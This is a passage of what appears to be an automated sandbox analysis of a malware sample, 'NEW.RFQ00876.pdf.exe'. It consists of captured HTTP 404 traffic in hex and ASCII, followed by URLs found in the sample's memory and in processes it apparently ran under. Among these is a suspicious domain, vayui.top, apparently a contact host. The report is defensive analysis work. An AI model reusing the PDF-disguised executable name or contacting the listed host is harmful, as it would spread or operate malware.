72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 05:58:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 05:58:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 09 Dec 2024 05:58:48 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 09 Dec 2024 05:58:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 09 Dec 2024 05:58:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 09 Dec 2024 05:58:56 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 67 79 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ugyg/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 09 Dec 2024 05:59:04 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 09 Dec 2024 05:59:06 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 09 Dec 2024 05:59:09 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 09 Dec 2024 05:59:12 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 05:59:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 05:59:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 05:59:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 06:00:02 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 06:00:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5n9htlE53RLATzMY9d8jJAh1SDks7HYQydUImQswIagl3ykdUIVmDAQ2hGQSTO39Q%2Baqsar64qYuG%2Fa4JT6pkJs7EhOa2D8rPEQskYrd%2BEgAz6vQ58eQ2sccnuwL5N2Z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ef2c66b2aea7c87-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=817&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: msinfo32.exe, 0000001A.00000002.3732924393.000000000522C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3731711084.00000000048AF000.00000004.00000020.00020000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.1770860245.0000000020BDC000.00000004.80000000.00040000.00000000.sdmp, NEW.RFQ00876.pdf.exe, RAangyFeHdZLco.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: msinfo32.exe, 0000001A.00000002.3732924393.000000000522C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3731711084.00000000048AF000.00000004.00000020.00020000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.1770860245.0000000020BDC000.00000004.80000000.00040000.00000000.sdmp, NEW.RFQ00876.pdf.exe, RAangyFeHdZLco.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: msinfo32.exe, 0000001A.00000002.3732924393.000000000522C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3731711084.00000000048AF000.00000004.00000020.00020000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.1770860245.0000000020BDC000.00000004.80000000.00040000.00000000.sdmp, NEW.RFQ00876.pdf.exe, RAangyFeHdZLco.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RAangyFeHdZLco.exe, 00000014.00000002.1407964518.0000000002725000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: aegBDZrMeWOlT.exe, 0000001B.00000002.3733834808.00000000054AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vayui.top
                Source: aegBDZrMeWOlT.exe, 0000001B.00000002.3733834808.00000000054AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vayui.top/ge5i/
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
